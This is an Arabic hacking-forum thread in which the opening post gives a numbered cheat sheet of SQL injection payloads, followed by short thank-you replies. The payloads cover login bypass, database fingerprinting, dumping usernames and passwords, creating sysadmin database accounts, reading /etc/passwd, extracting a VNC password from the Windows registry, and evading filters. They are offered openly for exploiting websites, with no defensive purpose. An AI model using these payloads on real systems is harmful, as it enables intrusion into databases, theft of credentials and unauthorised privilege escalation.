![]() |
![]() |
![]() |
التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"
مطلوب مشرفين على كامل اقسام المنتدى
|
|
![]() |
|
|
|
![]() |
|
| [ منتدى حـقن قواعد البيانات | Sql injcetion ] قسم يهتم باهم ثـغرات الحقن .. حقن قواعد البيانات واهم الطرق المستعملة في ذلـك , |
![]() |
|
|
أدوات الموضوع | انواع عرض الموضوع |
|
|
المشاركة رقم: 1 | ||||||||||||||||||||
شكراً: 1
تم شكره 5 مرة في 3 مشاركة
|
السلام عليكم ورحمه الله وبركاته كيف الحال اعضاء منتدانا الغالي حبيت انزل بعض الاوامر اللي تساعد في تخطي واستغلال ثغرات الحقن نبداء : 1- حركات اساسية تستخدم لتسجيل الدخول بدون يوزر وباس : 2- حركات اخرى معروووفة للجميع تستخدم في قواعد MsSQL: - ' having 1=1-- - ' group by userid having 1=1-- - ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')-- - ' union select sum(columnname) from tablename-- ######################## 3- تجميع المعلومات : - ' or 1 in (select @@version)-- - ' union all select @@version-- ######################## 4- انواع قواعد البيانات واهم القواعد الاساسية الملحقة بها : -->SYS.USER_OBJECTS (USEROBJECTS) -->SYS.USER_VIEWS -->SYS.USER_TABLES -->SYS.USER_VIEWS -->SYS.USER_TAB_COLUMNS -->SYS.USER_CATALOG -->SYS.USER_TRIGGERS -->SYS.ALL_TABLES -->SYS.TAB MySQL -->mysql.user -->mysql.host -->mysql.db MS access -->MsysACEs -->MsysObjects -->MsysQueries -->MsysRelationships MS SQL Server -->sysobjects -->syscolumns -->systypes -->sysdatabases ######################## 5- سحب كلمات السر : '; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end -- ' and 1 in (select var from temp)-- ' ; drop table temp -- ######################## 6- انشاء حسابات مستخدمين على القواعد المختلفة : MS SQL exec sp_addlogin 'name' , 'password' exec sp_addsrvrolemember 'name' , 'sysadmin' MySQL INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123')) Access CRATE USER name IDENTIFIED BY '123456' Postgres (requires Unix account) CRATE USER name WITH PASSWORD '123456' Oracle CRATE USER name IDENTIFIED BY 123456 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; GRANT CONNECT TO name; GRANT RESOURCE TO name; ######################## 7- استدعاء ملف من السيرفر : - ' union select 1,load_file('/etc/passwd'),1,1,1; ######################## 8- معرفة اسم السيرفر والكونفج : - ' and 1 in (select @@servername)-- - ' and 1 in (select servername from master.sysservers)-- ######################## 9- الحصول على اسم المستخدم والباسورد للـفي ان اس : - '; declare @out binary(8) - exec master..xp_regread - @rootkey = 'HKEY_LOCAL_MACHINE', - @key = 'SOFTWARE\ORL\WinVNC3\Default', - @value_name='password', - @value = @out output - select cast (@out as bigint) as x into TEMP-- - ' and 1 in (select cast(x as varchar) from temp)-- ######################## 10- التحايل على صناديق ادخال اسم المستخدم وكلمات السر : - ' OR 'unusual' = 'unusual' - ' OR 'something' = 'some'+'thing' - ' OR 'text' = N'text' - ' OR 'something' like 'some%' - ' OR 2 > 1 - ' OR 'text' > 't' - ' OR 'whatever' in ('whatever') - ' OR 2 BETWEEN 1 and 3 ######################## 11- النقطة السابقة نفسها لكن باستخدام الفواصل والشرطات نستخدم /**/ لتخطي الفلتره على علامة + او المسافة : -->'/**/OR/**/1/**/=/**/1 -->Username:' or 1/* -->Password:*/=1-- -->UNI/**/ON SEL/**/ECT -->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER' -->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER') ########### وشكرآ ...في انتظار ردودكم
|
||||||||||||||||||||
|
|
||||||||||||||||||||
|
|
المشاركة رقم: 2 | ||||||||||||
|
|
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 3 | ||||||||||||
|
مشكورة اختي |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 4 | ||||||||||||
|
تسلم ايدك مشكووووووووور |
||||||||||||
|
|
||||||||||||
![]() |
| مواقع النشر (المفضلة) |
| حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف) | |
(أظهر الكل)
الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 35
|
|
| abdou17 , acer-dz , ANDERSON , arbi , Black Demon Dz , البرنس هاشم , الشبح المرح , Dr-Genix , dzkabyle , Dz_V!rUs , ExPLo!T_Dz , fire-dz , fleurshi , hichem05 , HMODH , Ic3.BoY , Imad.Dz , lasbat-dz , lennix , MdMn HaCk3r , moja4ed_fz , Mouna128 , n2nhacker , o0o , questral , RAGE SCREAM , S1LV3rS3rf3r , TaYLoR.Dz , Th3 K!LL3r Dz , ThE JoCkEy , toxine , WOLF_DZ , xdvb , X_AviaTique_X , zerocool |
|
|
المواضيع المتشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| تحديث الصفحة دورة كاملة لكشف التلغيم (مؤقت) | انور العراقي | [ مـنتدى حمايه الـبريد الالكتروني | Hacking E-mails ] | 4 | 21/11/2014 13:20 |
| تحديث الصفحة برنامج File Gen لسرقة الايميلات ((شرح بالصور)) والتبليغ مضمون 100%100 | انور العراقي | [ مـنتدى حمايه الـبريد الالكتروني | Hacking E-mails ] | 6 | 28/08/2010 12:47 |
![]() |
![]() |
![]() |